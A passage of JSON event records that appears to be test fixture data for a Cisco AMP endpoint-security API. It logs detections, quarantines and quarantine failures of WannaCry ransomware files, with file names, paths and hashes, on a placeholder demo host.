pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 